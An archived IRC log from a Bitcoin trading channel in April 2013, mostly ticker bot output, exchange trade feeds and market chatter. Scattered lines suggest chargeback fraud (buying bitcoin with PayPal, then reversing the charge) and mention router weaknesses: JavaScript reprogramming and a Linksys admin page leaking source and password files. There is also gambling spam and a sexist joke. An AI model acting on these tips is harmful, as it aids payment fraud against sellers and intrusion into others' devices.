bitcoins on ebay Apr 08 20:49:45 HOHOHO Apr 08 20:49:51 someone is selling 1 litecoin for ten bucks Apr 08 20:50:03 that was the first place i tried last year Apr 08 20:50:07 bitcoins never came Apr 08 20:50:13 so i got my money back Apr 08 20:50:23 ebay may be the best place for bitcoins in the future Apr 08 20:50:33 they also own paypal Apr 08 20:50:48 i've been harping on the guy who runs their android operation to bring me on to build a consumer wallet thing Apr 08 20:51:05 has not yet bitten Apr 08 20:51:11 although i made him filthy rich on bitcoins Apr 08 20:51:32 buy a bitcoin from someone with paypal for $250.00 Apr 08 20:51:40 then reverse the charge once it's in your wallet Apr 08 20:51:49 a good buy at any price under 5k lippoper Apr 08 20:52:08 ebay won't do that Apr 08 20:52:12 "Yes paypal customer service, I never received the bitcoin" Apr 08 20:52:14 they actually do due dilligence Apr 08 20:52:21 not from what I read Apr 08 20:52:22 nah Apr 08 20:52:33 even btc-e.com stopped accepting PayPal due to this reason. Apr 08 20:52:35 you'll have to have an agreed upon address Apr 08 20:52:39 duh Apr 08 20:52:45 duh Apr 08 20:52:48 paypal's not doing *your* due dilligence Apr 08 20:52:55 they do it when they have skin in the game Apr 08 20:53:05 $avg Apr 08 20:53:07 ThickAsThieves: 175.99 Apr 08 20:53:16 they reverse charges like credit card company, sometimes even more easily. Apr 08 20:53:34 the default opionion in credit card land is that customers are right Apr 08 20:53:37 and vendors are evil Apr 08 20:53:42 the expectation creates the reality Apr 08 20:55:23 it's not entirely a bad thing, given the shit state of their technology Apr 08 20:58:15 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [-] Apr 08 20:58:19 [BTCTC] [ASICMINER-PT] 2 @ 0.76211 = 1.5242 BTC [-] Apr 08 20:58:22 anyways. i would bet on paypal being a major player in the exchange business. Apr 08 20:58:29 [BTCTC] [ASICMINER-PT] 2 @ 0.7621 = 1.5242 BTC [-] Apr 08 20:58:31 they're hungry for new business. Apr 08 20:58:35 [BTCTC] [ASICMINER-PT] 4 @ 0.7621 = 3.0484 BTC [-] Apr 08 20:58:43 and they could be percieved as a professional outfit that understands security. Apr 08 20:59:16 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Apr 08 20:59:43 dammit i shut b-a down again. Apr 08 21:04:11 we're going back up ;;ticker Apr 08 21:04:20 ;;ticker Apr 08 21:04:20 BTCUSD ticker | Best bid: 182.23401, Best ask: 182.67570, Bid-ask spread: 0.44169, Last trade: 182.67570, 24 hour volume: 100199.76586949, 24 hour low: 157.00000, 24 hour high: 194.90000, 24 hour vwap: 177.36797 Apr 08 21:04:29 still a fake price Apr 08 21:04:32 ;;goxlag Apr 08 21:04:33 MtGox lag is 34.868194 seconds. During this time, light travels 0.0698754703722 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 08 21:05:12 "fake"? Apr 08 21:05:23 sorry Apr 08 21:05:28 fleeting Apr 08 21:05:35 aren't all? Apr 08 21:05:38 ... Apr 08 21:05:52 i guess my point was not clear whatsoever Apr 08 21:05:54 do you have a steady-state value you expect? Apr 08 21:06:12 i dont think gox is letting us see the natural price yet Apr 08 21:06:15 due to lag Apr 08 21:06:16 oh i think i get it Apr 08 21:06:18 thanks Apr 08 21:06:32 obviously i want to fight today Apr 08 21:06:37 *eyeroll* Apr 08 21:06:44 hehe Apr 08 21:06:48 it freezing on a price for 60s is sorta meaningless Apr 08 21:07:06 even when it's not lagged, it's lagged today Apr 08 21:09:02 further hints of impending doom for gox Apr 08 21:09:12 can has short them? Apr 08 21:09:41 short the company who's revenue is skyrocketing exponentially. have fun with that. Apr 08 21:09:52 hm. Apr 08 21:10:53 how do make play agains company that's horribly run and yet profitable? Apr 08 21:11:09 don't Apr 08 21:11:17 imsaguy everytime i get opped i do something wrong like +m the channel or try to fix the topic when it is topic locked Apr 08 21:11:22 look for other opportunities. Apr 08 21:11:25 plus it's ADHD chat. you can't fix it Apr 08 21:11:31 aye Apr 08 21:11:41 it really needs to start over Apr 08 21:11:46 its lost focus Apr 08 21:11:48 reboot! Apr 08 21:11:59 there's something to be said about -foyer Apr 08 21:12:05 needs ninja ops booting stupid people Apr 08 21:12:05 it kept much of the OT in there Apr 08 21:12:09 yep Apr 08 21:12:17 but nanotube says no Apr 08 21:12:22 ikr Apr 08 21:12:25 so it is what it is Apr 08 21:12:30 woohoo! Apr 08 21:12:36 is it? Apr 08 21:12:50 not really i don't like it there Apr 08 21:13:00 maybe 20-50 nicks i can trust Apr 08 21:13:37 :-/ Apr 08 21:13:43 sucky feeling Apr 08 21:13:56 maybe you need to adjust your wot? Apr 08 21:15:09 which one Apr 08 21:15:19 i've had to create like 30 accounts to defend myself Apr 08 21:15:22 back to 12MM in bids Apr 08 21:16:17 ;;bids 0 Apr 08 21:16:22 ;;asks 9999999999 Apr 08 21:16:29 what are you catching flak for jcpham? Apr 08 21:16:43 nothing actually Apr 08 21:16:49 imsaguy and i were having a chat Apr 08 21:24:02 ;;goxlag Apr 08 21:24:06 MtGox lag is 99.982987 seconds. During this time, light travels 0.200364786483 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 08 21:27:03 venutians accepting bitcion now? Apr 08 21:27:21 [BTCTC] [PAJKA.BOND] 19 @ 0.1 = 1.9 BTC [-] Apr 08 21:28:25 forbes letter from the editor says we need to take the dollar seriously Apr 08 21:28:37 i call bitcoin top when forbes letter from the editor says dollar is dead Apr 08 21:28:46 :D Apr 08 21:30:01 [MPEX] [S.BBET] 1000 @ 0.00085021 = 0.8502 BTC [+] Apr 08 21:30:03 [MPEX] [S.BBET] 500 @ 0.00085021 = 0.4251 BTC [+] Apr 08 21:30:05 [MPEX] [S.BBET] 992 @ 0.00079521 = 0.7888 BTC [-] Apr 08 21:33:59 [HAVELOCK] [VTX] 8 @ 0.31 = 2.48 BTC [-] Apr 08 21:35:32 god i love russia Apr 08 21:35:37 if you're rich enough Apr 08 21:35:41 you can has kremlin Apr 08 21:35:47 but also Apr 08 21:35:50 might get popped Apr 08 21:36:00 [HAVELOCK] [VTX] 1 @ 0.29 BTC [-] Apr 08 21:36:22 popped like a grape Apr 08 21:37:44 it would be nice to be king of cascadia Apr 08 21:37:54 very little ambition in these parts Apr 08 21:38:14 a few executions to set the tone Apr 08 21:42:11 [MPEX] [S.MPOE] 5100 @ 0.00065422 = 3.3365 BTC [-] Apr 08 21:42:12 [MPEX] [S.MPOE] 475 @ 0.00065873 = 0.3129 BTC [+] Apr 08 21:42:19 [MPEX] [S.MPOE] 1300 @ 0.0006607 = 0.8589 BTC [+] Apr 08 21:42:26 [MPEX] [S.MPOE] 5525 @ 0.00066071 = 3.6504 BTC [+] Apr 08 21:43:53 back to 188 already Apr 08 21:53:53 while you waiting for BTC to jump hugely again you can play a new game that you can win up to 17X your bet by trying to walk through a minefield. also freeplay option so you dont have to bet! http://www.satoshi-karoshi.com/?r=10670 Apr 08 21:55:31 GAMBLE TO NEXT LEVEL Apr 08 21:56:22 don't go... Apr 08 21:56:27 we were just starting to have fun... Apr 08 21:56:40 play a game where you walk through a minefield? how is that fun? Apr 08 21:57:05 it's gambling Apr 08 21:57:13 don't try and reason Apr 08 21:57:17 just take the fools monies. Apr 08 21:57:24 fools' Apr 08 21:58:26 hard to take their money if they don't want to play Apr 08 21:58:45 *shrug* Apr 08 21:58:54 a small fraction of the world is a lot of people Apr 08 21:59:17 .2% of people reply to nigerian scammers Apr 08 21:59:22 yes, and a large fraction of the world is even more people Apr 08 21:59:23 it's enough Apr 08 21:59:24 oh man i do Apr 08 21:59:41 they never write back, though. Apr 08 22:00:02 send them bitcoins and then sell them technical support in USD Apr 08 22:00:21 wat Apr 08 22:00:26 acquire cryptocurrencies Apr 08 22:00:30 disregard fiat Apr 08 22:01:56 [BTCTC] [BTC-MINING] 2 @ 0.021 = 0.042 BTC [-] Apr 08 22:02:59 do you like bitcoin? do you like super mario kart? then you'll LOVE SatoshiYoshi.com! Apr 08 22:03:18 I like both those things!!! Apr 08 22:03:37 let me give you my money! Apr 08 22:03:45 good idea! Apr 08 22:03:49 there was nothing there? Apr 08 22:03:53 T_T Apr 08 22:04:23 there should be an .exe file you need to run Apr 08 22:04:48 yuss Apr 08 22:05:01 dudes i saw a thing about using javascript to reprogram routers yesterday Apr 08 22:05:11 from user browsers Apr 08 22:05:16 benkay: sounds cool Apr 08 22:05:23 you can do the same with UPnP Apr 08 22:05:36 i love breaking things. Apr 08 22:05:40 who doesn't Apr 08 22:06:13 i like making things Apr 08 22:06:48 both can be fun Apr 08 22:07:58 ;;ticker Apr 08 22:08:04 ;;bc,24hprc Apr 08 22:08:06 177.01 Apr 08 22:08:07 BTCUSD ticker | Best bid: 186.06253, Best ask: 186.99999, Bid-ask spread: 0.93746, Last trade: 186.99999, 24 hour volume: 102774.98338597, 24 hour low: 157.00000, 24 hour high: 194.90000, 24 hour vwap: 178.38721 Apr 08 22:08:41 fucking linksys routers. totally unprotected. Apr 08 22:09:02 add a '/' to any admin url to see source code, lol! Apr 08 22:09:19 print password file with simple request Apr 08 22:13:38 [BTCTC] [ASICMINER-PT] 1 @ 0.794 BTC [+] Apr 08 22:21:57 [HAVELOCK] [KCIM] 4 @ 1.209 = 4.836 BTC [+] Apr 08 22:22:31 ;;goxlag Apr 08 22:22:32 MtGox lag is 3.534177 seconds. During this time, light travels 0.00708245113738 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 08 22:22:33 ;;ticker Apr 08 22:22:34 BTCUSD ticker | Best bid: 185.30001, Best ask: 185.95999, Bid-ask spread: 0.65998, Last trade: 185.30001, 24 hour volume: 102926.03575566, 24 hour low: 157.00000, 24 hour high: 194.90000, 24 hour vwap: 178.47044 Apr 08 22:23:00 $avg Apr 08 22:23:02 lippoper: 177.37 Apr 08 22:23:07 is that the real price? Apr 08 22:23:22 around 177-179 ? Apr 08 22:25:31 ;;asks 195 Apr 08 22:25:34 There are currently 7494.7663 bitcoins offered at or under 195.0 USD, worth 1443781.28381 USD in total. | Data vintage: 0.0012 seconds Apr 08 22:25:36 ;;bids 170 Apr 08 22:25:37 There are currently 9839.9499 bitcoins demanded at or over 170.0 USD, worth 1748284.48795 USD in total. | Data vintage: 3.0379 seconds Apr 08 22:26:13 ;ticker --high Apr 08 22:27:32 ;;nethash Apr 08 22:27:32 62837.3281404 Apr 08 22:29:28 !ticker h him Apr 08 22:29:31 [HAVELOCK:HIM] 1D: 1.89000000 / 1.92735294 / 1.93000000 (17 shares, 32.76500000 BTC), 7D: 1.82000000 / 1.90417629 / 2.05990000 (97 shares, 184.70510000 BTC), 30D: 1.41000000 / 1.85736363 / 2.08000000 (693 shares, 1287.15299230 BTC) Apr 08 22:34:14 ;;ticker Apr 08 22:34:15 BTCUSD ticker | Best bid: 188.89002, Best ask: 189.80261, Bid-ask spread: 0.91259, Last trade: 189.80261, 24 hour volume: 104076.87236816, 24 hour low: 157.00000, 24 hour high: 194.90000, 24 hour vwap: 178.63555 Apr 08 22:34:16 thickasthieves making things is important and cool Apr 08 22:35:42 so how long would it take to make your money back on dividends on sdice stocks? Apr 08 22:35:54 a lifetime these days Apr 08 22:41:09 ;;bc,blocks Apr 08 22:41:10 230331 Apr 08 22:46:11 ;;nethash Apr 08 22:46:13 62888.8850858 Apr 08 22:46:18 ;;estimate Apr 08 22:46:19 Next difficulty estimate | 8839306.76485 based on data since last change | 8785341.70019 based on data for last three days Apr 08 22:46:37 dat discussion... http://www.reddit.com/r/funny/comments/1bxakb/the_mens_guide_to_showering/ Apr 08 22:54:11 [BTCTC] [LTC-MINING] 1 @ 0.24001 BTC [+] Apr 08 22:55:27 [BTCTC] [COGNITIVE] 1 @ 0.13789 BTC [+] Apr 08 22:55:35 [BTCTC] [COGNITIVE] 2 @ 0.1379 = 0.2758 BTC [+] Apr 08 22:58:14 ;;tslb Apr 08 22:58:18 Time since last block: 47 minutes and 53 seconds Apr 08 22:59:59 [MPEX] [S.MPOE] 6250 @ 0.00065356 = 4.0848 BTC [-] Apr 08 23:02:46 [MPEX] [S.MPOE] 9250 @ 0.00066071 = 6.1116 BTC [+] Apr 08 23:08:15 ;;tslb Apr 08 23:08:20 Time since last block: 3 minutes and 2 seconds Apr 08 23:13:13 [BTCTC] [ASICMINER-PT] 2 @ 0.789 = 1.578 BTC [-] Apr 08 23:15:14 [BTCTC] [ASICMINER-PT] 28 @ 0.795 = 22.26 BTC [+] Apr 08 23:15:56 [BTCTC] [BTC-BOND] 998 @ 0.01 = 9.98 BTC [+] Apr 08 23:16:00 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Apr 08 23:16:06 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Apr 08 23:16:32 [MPEX] [S.MPOE] 1481 @ 0.00066071 = 0.9785 BTC [+] Apr 08 23:16:34 [MPEX] [S.MPOE] 6007 @ 0.00066211 = 3.9773 BTC [+] Apr 08 23:40:11 [BTCTC] [PAJKA.BOND] 8 @ 0.1024 = 0.8192 BTC [+] Apr 08 23:58:01 ;;goxlag Apr 08 23:58:02 MtGox lag is 0.361659 seconds. During this time, light travels 0.000724760586664 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 08 23:58:15 ;;ticker Apr 08 23:58:16 BTCUSD ticker | Best bid: 188.25001, Best ask: 188.41000, Bid-ask spread: 0.15999, Last trade: 188.25001, 24 hour volume: 106530.94142469, 24 hour low: 160.00000, 24 hour high: 194.90000, 24 hour vwap: 179.70143 Apr 08 23:58:58 quiet for how volatole of a day it was Apr 08 23:59:19 everyone is tired from it :D Apr 08 23:59:20 mtgox socket has been down for 85 minutes Apr 09 00:00:42 jurov lemme use coinbr for free Apr 09 00:00:43 jkjk Apr 09 00:01:19 O? And why? Apr 09 00:02:23 (hopes for jk punchline) Apr 09 00:03:44 [BTCTC] [ASICMINER-PT] 2 @ 0.763 = 1.526 BTC [-] Apr 09 00:04:50 !ticker btctc asicminer-ot Apr 09 00:04:51 Shit. You ain't even old enough to smoke. Apr 09 00:04:52 !ticker btctc asicminer-pt Apr 09 00:04:53 [BTCT:ASICMINER-PT] 1D: 0.76 / 0.78376 / 0.795 (205 shares, 160.7 BTC), 7D: 0.683004 / 0.76178 / 0.795 (1253 shares, 954.5 BTC), 30D: 0.59998 / 0.77589 / 0.9489 (7745 shares, 6009.3 BTC) Apr 09 00:05:15 !ticker h him Apr 09 00:05:16 [HAVELOCK:HIM] 1D: 1.89000000 / 1.92735294 / 1.93000000 (17 shares, 32.76500000 BTC), 7D: 1.82000000 / 1.90417629 / 2.05990000 (97 shares, 184.70510000 BTC), 30D: 1.41000000 / 1.85736363 / 2.08000000 (693 shares, 1287.15299230 BTC) Apr 09 00:08:16 ;;rate thestringpuller -1 "joke's on you" Apr 09 00:08:16 Error: For identification purposes, you must be authenticated to use the rating system. Apr 09 00:09:35 but no, you're a friend :) Apr 09 00:09:40 22:59 < jurov> everyone is tired from it :D <-- yeah, but so all the buyers are new? Apr 09 00:10:45 how does it follow? Apr 09 00:11:01 i meant, btcusd tired us Apr 09 00:11:27 hence the silence Apr 09 00:12:07 mtgox socket down fo 95 minutes now Apr 09 00:12:30 yeah, but trading goes on Apr 09 00:12:45 where? bitcoinity says 235s Apr 09 00:13:05 ohh you mean whole socket api down, not lag? Apr 09 00:13:12 yes Apr 09 00:13:54 they will follow mpex lead. no socket api (or third party only) Apr 09 00:13:58 [HAVELOCK] [VTX] 1 @ 0.2802 BTC [-] Apr 09 00:13:59 [HAVELOCK] [VTX] 2 @ 0.28 = 0.56 BTC [-] Apr 09 00:14:00 [HAVELOCK] [VTX] 2 @ 0.258 = 0.516 BTC [-] Apr 09 00:14:02 [HAVELOCK] [VTX] 3 @ 0.25 = 0.75 BTC [-] Apr 09 00:14:02 [HAVELOCK] [VTX] 1 @ 0.24 BTC [-] Apr 09 00:14:05 then withdrawals will get deprecated Apr 09 00:14:06 http://nymag.com/daily/intelligencer/2013/04/inside-the-bitcoin-bubble-bitinstants-ceo.html Apr 09 00:15:11 equity is getting shit on, for now Apr 09 00:15:54 jborkl_: btc equity? Apr 09 00:16:07 stocks Apr 09 00:16:13 if all the buyers are new, we might crash soon when press slows down Apr 09 00:17:09 define crash... some fellows here call even correction to 170 a "crash" Apr 09 00:17:11 buyers are interested in other things for now, but obtaining bitcoins is getting more and more expensive. therefore will be worth more later Apr 09 00:17:36 counter-trend correction more likely before press slowdown if past is any indicator. Apr 09 00:17:37 like < 100 Apr 09 00:17:45 yeah, we go from 20 to 200 and people scream when it goes to 170 Apr 09 00:18:23 crash to me would be price drop of >50%. Apr 09 00:18:41 who knows Apr 09 00:19:04 jborkl_: stocks seem ok? https://www.google.com/finance?q=INDEXDJX:.DJI Apr 09 00:19:21 or you talking btc exchange stocks lie sdice am etc Apr 09 00:19:26 they seem ok? Apr 09 00:19:49 I don't look at fiat stocks Apr 09 00:20:19 which btc stocks are crashing? Apr 09 00:20:33 err getting shit on Apr 09 00:20:36 (not crashing) Apr 09 00:21:30 right now we have churn… hard to say what will happen when it breaks. Apr 09 00:21:43 [BTCTC] [ASICMINER-PT] 20 @ 0.7624 = 15.248 BTC [-] Apr 09 00:22:12 [BTCTC] [ASICMINER-PT] 10 @ 0.7624 = 7.624 BTC [-] Apr 09 00:22:14 [BTCTC] [ASICMINER-PT] 4 @ 0.7623 = 3.0492 BTC [-] Apr 09 00:22:17 [BTCTC] [ASICMINER-PT] 1 @ 0.76211 BTC [-] Apr 09 00:22:18 asicminer crashing! Apr 09 00:22:19 [BTCTC] [ASICMINER-PT] 1 @ 0.762027 BTC [-] Apr 09 00:22:22 [BTCTC] [ASICMINER-PT] 1 @ 0.762024 BTC [-] Apr 09 00:22:24 :) Apr 09 00:22:25 [BTCTC] [ASICMINER-PT] 1 @ 0.762022 BTC [-] Apr 09 00:22:26 not really... Apr 09 00:22:28 [BTCTC] [ASICMINER-PT] 1 @ 0.762021 BTC [-] Apr 09 00:22:30 [BTCTC] [ASICMINER-PT] 1 @ 0.762 BTC [-] Apr 09 00:22:33 [BTCTC] [ASICMINER-PT] 10 @ 0.7611 = 7.611 BTC [-] Apr 09 00:22:36 That is correct, I said they were getting shit on Apr 09 00:22:40 not crashing Apr 09 00:22:58 https://www.google.com/trends/explore#q="bitcoin"&date=today+1-m&cmpt=q Apr 09 00:23:06 The Great ASICminer Crash of 4-8-13 Apr 09 00:23:06 on volume of what 50 shares? Apr 09 00:23:17 [BTCTC] [ASICMINER-PT] 1 @ 0.76011 BTC [-] Apr 09 00:23:19 [BTCTC] [ASICMINER-PT] 1 @ 0.75502 BTC [-] Apr 09 00:23:37 I did not name a stock Apr 09 00:23:38 upward trend stopped.. but dunno whether recent google data is reliable Apr 09 00:23:48 so guys Apr 09 00:23:50 AM really is stuck in a trading range. Apr 09 00:23:54 i was just doing some maths Apr 09 00:24:06 and all those loans i made... that never repaid me Apr 09 00:24:13 $290,000 Apr 09 00:24:20 upward trend is still there whatcha mean? Apr 09 00:24:27 https://www.google.com/trends/explore#q=bitcoin&date=1%2F2013%2012m&cmpt=q Apr 09 00:24:39 double facepalm /o\ /o\ Apr 09 00:24:40 lesson learned, dont loan btc Apr 09 00:24:42 that doesn't even make sense to me Apr 09 00:24:50 the chart? Apr 09 00:25:05 google is dumb and noted incomplete data as a cliff Apr 09 00:25:06 the relative value Apr 09 00:25:41 that data is not realtime Apr 09 00:25:49 all bitcoin searches halted Apr 09 00:25:53 no one cares anymore Apr 09 00:26:35 surely Apr 09 00:26:40 that would make the most sense Apr 09 00:26:51 i'm glad we can see eye to eye on this Apr 09 00:26:58 [HAVELOCK] [SDICE] 1 @ 0.30499999 BTC [-] Apr 09 00:26:58 disregard today... it seems declining since wednesday... i doubt it takes them 3 days to aggregate all data Apr 09 00:27:02 i thought you were about to say people were still searching for bitcoin Apr 09 00:27:20 and the google data in incomplete Apr 09 00:27:31 socket down for 110 minutes now Apr 09 00:27:34 but i'm pretty sure all bitcoin searches basically stopped Apr 09 00:27:45 lol Apr 09 00:27:45 all at once if by magic Apr 09 00:27:57 [HAVELOCK] [HIM] 1 @ 1.89 BTC [-] Apr 09 00:27:58 [HAVELOCK] [HIM] 6 @ 1.81 = 10.86 BTC [-] Apr 09 00:28:27 jborkl_, agree with you re: BTC equities having a bad run: VTX just traded on Havelock for 0.24, down huge from 0.799 peak Apr 09 00:28:47 new articles keep popping up like this http://www.zdnet.com/how-to-buy-and-sell-bitcoins-part-1-theory-7000013661/ Apr 09 00:29:09 scarey "howtos" Apr 09 00:29:12 i sold all my vtx in high 70s Apr 09 00:29:16 twas fun Apr 09 00:29:22 yeah, to me. thanks again Apr 09 00:29:25 so that was you lol Apr 09 00:29:27 vtx is what? Apr 09 00:29:35 https://www.havelockinvestments.com/fund.php?symbol=VTX Apr 09 00:29:35 cavirtex Apr 09 00:29:46 canadian currency exchange Apr 09 00:29:53 canuckoins Apr 09 00:30:02 The Mt. Gox of Canadia Apr 09 00:30:14 mm $207/btc there? Apr 09 00:30:14 gotcha Apr 09 00:30:20 Where BTC has already crossed $200 CAD, btw. Apr 09 00:30:22 cad Apr 09 00:30:23 although there really is only one mtgox Apr 09 00:30:34 CAD is not real money Apr 09 00:30:36 is why Apr 09 00:30:42 Yes, at least Virtex functions... Apr 09 00:30:52 CAD = "dollarettes" Apr 09 00:30:57 hehe Apr 09 00:31:13 ;;volume Apr 09 00:31:13 Error: "volume" is not a valid command. Apr 09 00:31:21 ;;ticker Apr 09 00:31:23 Currently Almost a Dollar Apr 09 00:31:24 BTCUSD ticker | Best bid: 183.75000, Best ask: 183.95000, Bid-ask spread: 0.20000, Last trade: 183.95000, 24 hour volume: 111564.57755450, 24 hour low: 160.00000, 24 hour high: 194.90000, 24 hour vwap: 180.22433 Apr 09 00:31:38 wow 111K not bad. Apr 09 00:31:58 Havelock bubble finally popping? Apr 09 00:32:10 yep, i started trading there Apr 09 00:32:11 huh? Apr 09 00:32:36 !ticker h him Apr 09 00:32:37 [HAVELOCK:HIM] 1D: 1.81000000 / 1.89166667 / 1.93000000 (21 shares, 39.72500000 BTC), 7D: 1.81000000 / 1.89860673 / 2.05990000 (104 shares, 197.45510000 BTC), 30D: 1.41000000 / 1.85700427 / 2.08000000 (700 shares, 1299.90299230 BTC) Apr 09 00:33:15 Xrp sure is popping Apr 09 00:33:38 Down down down Apr 09 00:34:21 http://btctrading.wordpress.com/ Apr 09 00:37:01 [BTCTC] [ASICMINER-PT] 1 @ 0.763 BTC [+] Apr 09 00:39:39 ;;goxlag Apr 09 00:39:40 MtGox lag is 93.631956 seconds. During this time, light travels 0.187637391468 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 09 00:39:47 ;;ticker Apr 09 00:39:47 BTCUSD ticker | Best bid: 184.00000, Best ask: 185.00000, Bid-ask spread: 1.00000, Last trade: 185.00000, 24 hour volume: 111564.57755450, 24 hour low: 160.00000, 24 hour high: 194.90000, 24 hour vwap: 180.22433 Apr 09 00:43:27 [MPEX] [S.DICE] 100 @ 0.00301846 = 0.3018 BTC [+] Apr 09 00:54:30 !ticker h him Apr 09 00:54:31 [HAVELOCK:HIM] 1D: 1.81000000 / 1.88975 / 1.93000000 (20 shares, 37.79500000 BTC), 7D: 1.81000000 / 1.89860673 / 2.05990000 (104 shares, 197.45510000 BTC), 30D: 1.41000000 / 1.85700427 / 2.08000000 (700 shares, 1299.90299230 BTC) Apr 09 00:56:57 [HAVELOCK] [VTX] 7 @ 0.24 = 1.68 BTC [-] Apr 09 00:59:39 why is VTX crashing so hard anyway? Apr 09 00:59:57 [HAVELOCK] [HIM] 3 @ 1.81 = 5.43 BTC [-] Apr 09 00:59:59 [MPEX] [O.USD.C200T] 14 @ 0.14952605 = 2.0934 BTC [+] Apr 09 01:00:19 $avg Apr 09 01:00:21 ThickAsThieves: 179.97 Apr 09 01:03:05 [BTCTC] [BTC-BOND] 500 @ 0.01 = 5 BTC [+] Apr 09 01:03:57 [HAVELOCK] [VTX] 1 @ 0.24 BTC [-] Apr 09 01:06:34 [BTCTC] [S.DICE-PT] 1 @ 0.00418 BTC [+] Apr 09 01:08:56 [BTCTC] [ASICMINER-PT] 1 @ 0.7945 BTC [+] Apr 09 01:09:17 ;;seen smickles Apr 09 01:09:18 smickles was last seen in #bitcoin-assets 4 days, 6 hours, 26 minutes, and 48 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 09 01:17:04 24hr vwap now over 180... Apr 09 01:20:02 http://consumerist.com/2013/04/08/nyc-bar-to-allow-patrons-to-buy-drinks-with-bitcoins/ Apr 09 01:22:59 Hmmm. gotta try that just to see how smooth it is.. Apr 09 01:23:18 talking about the transaction not the whisky. Apr 09 01:23:54 ThickAsThieves re: VTX I imagine it's because it stopped going up and some of the people who bought 10K worth noticed there were only a few dozen shares worth of bids over 0.20 BTC Apr 09 01:24:08 cue the race for the exits Apr 09 01:24:17 also, it doesn't pay a div Apr 09 01:24:44 er by "10K worth" I mean the 10,000 shares offered at IPO Apr 09 01:25:04 no one buying post IPO to support the price Apr 09 01:27:36 !ticker m ^oix Apr 09 01:27:37 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 108.7315223 / 142.65191654 / 172.70719171 (19154 shares, 4,736.51 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 09 01:32:40 ;;seen topace|2 Apr 09 01:32:40 topace|2 was last seen in #bitcoin-assets 3 hours, 3 minutes, and 12 seconds ago: !ticker h him Apr 09 01:37:16 who is the admin for bitbet (on IRC) Apr 09 01:37:58 me and mircea Apr 09 01:47:30 kakobrekla: I want a refund. Apr 09 01:47:34 jkjk Apr 09 01:47:56 mircea and i* <- technically Apr 09 01:49:47 perhaps a slash was missing Apr 09 01:56:17 ;;ticker Apr 09 01:56:18 BTCUSD ticker | Best bid: 186.49891, Best ask: 187.00000, Bid-ask spread: 0.50109, Last trade: 187.00000, 24 hour volume: 112828.65816047, 24 hour low: 161.29378, 24 hour high: 194.90000, 24 hour vwap: 181.24809 Apr 09 01:56:20 ;;goxlag Apr 09 01:56:21 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 09 01:56:53 i always suspect trading is halted, when i see 0 sec Apr 09 02:00:18 http://i.qkme.me/3tryd1.jpg Apr 09 02:02:19 lol Apr 09 02:04:27 lol Apr 09 02:04:37 that has crossed my mind too Apr 09 02:07:00 my gf is smat enough :( Apr 09 02:07:10 smart Apr 09 02:11:14 i'd say my wife is smart enough, but she's so far removed from bitcoin it would not be so simple Apr 09 02:12:57 [HAVELOCK] [HIM] 1 @ 1.80999999 BTC [-] Apr 09 02:14:32 [BTCTC] [GSDPT] 75 @ 0.00329 = 0.2468 BTC [+] Apr 09 02:14:59 ThickAsThieves: just create an onetime script that sells everything with a market order and transfers it to her bank account Apr 09 02:15:09 or sth :) Apr 09 02:16:15 are we talking about bail strategies? Apr 09 02:16:30 benkay: http://i.qkme.me/3tryd1.jpg Apr 09 02:16:41 ah Apr 09 02:17:00 i see you have all chosen where to make your beds on the lady-triangle Apr 09 02:17:07 pretty and sane? Apr 09 02:17:25 i went with pretty and smart Apr 09 02:17:25 pretty insane Apr 09 02:17:46 and you didn't get smart? Apr 09 02:18:27 fast/cheap/good pick two in business Apr 09 02:18:38 smart/pretty/sane pick two in women Apr 09 02:18:45 ;;tslb Apr 09 02:18:51 Time since last block: 50 minutes and 2 seconds Apr 09 02:18:53 wtf Apr 09 02:19:05 interdasting... Apr 09 02:19:13 [MPEX] [S.MPOE] 12250 @ 0.00065675 = 8.0452 BTC [-] Apr 09 02:19:16 its true Apr 09 02:19:16 ;;bc,stats Apr 09 02:19:19 Current Blocks: 230349 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1490 blocks | Next Difficulty In About: 1 week, 2 days, 10 hours, 19 minutes, and 44 seconds | Next Difficulty Estimate: 8758402.77339 | Estimated Percent Change: 14.14574 Apr 09 02:19:26 its not true Apr 09 02:19:37 i've seen stupid+ugly+insane Apr 09 02:19:49 talking about the optimization, friend. Apr 09 02:19:54 i was speaking about 349 being last block Apr 09 02:19:55 not the whole space Apr 09 02:20:13 and that, kakobrekla, is interesting. Apr 09 02:20:28 ah Apr 09 02:20:34 50 just poped up Apr 09 02:20:37 rally may resume Apr 09 02:21:14 ;;ticker Apr 09 02:21:15 BTCUSD ticker | Best bid: 186.00001, Best ask: 186.84340, Bid-ask spread: 0.84339, Last trade: 187.00000, 24 hour volume: 113791.55742270, 24 hour low: 161.29378, 24 hour high: 194.90000, 24 hour vwap: 181.32145 Apr 09 02:21:21 what, nothing ? Apr 09 02:21:42 yeah pft 180 Apr 09 02:21:45 thats nothing Apr 09 02:22:49 srsly. Apr 09 02:23:04 "1. We have only just opened 2. We have no previous history 3. We are taking your money in Advance" Apr 09 02:23:10 https://bitcointalk.org/index.php?topic=170332.0;topicseen Apr 09 02:23:57 [HAVELOCK] [VTX] 1 @ 0.23999999 BTC [-] Apr 09 02:25:50 win. Apr 09 02:29:07 [BTCTC] [ASICMINER-PT] 1 @ 0.78992 BTC [-] Apr 09 02:29:58 [HAVELOCK] [VTX] 1 @ 0.23999999 BTC [-] Apr 09 02:29:59 [HAVELOCK] [VTX] 2 @ 0.23999999 = 0.48 BTC [-] Apr 09 02:30:03 [BTCTC] [ASICMINER-PT] 1 @ 0.78993 BTC [+] Apr 09 02:30:30 [BTCTC] [ASICMINER-PT] 2 @ 0.7943 = 1.5886 BTC [+] Apr 09 02:30:53 [BTCTC] [ASICMINER-PT] 2 @ 0.7944 = 1.5888 BTC [+] Apr 09 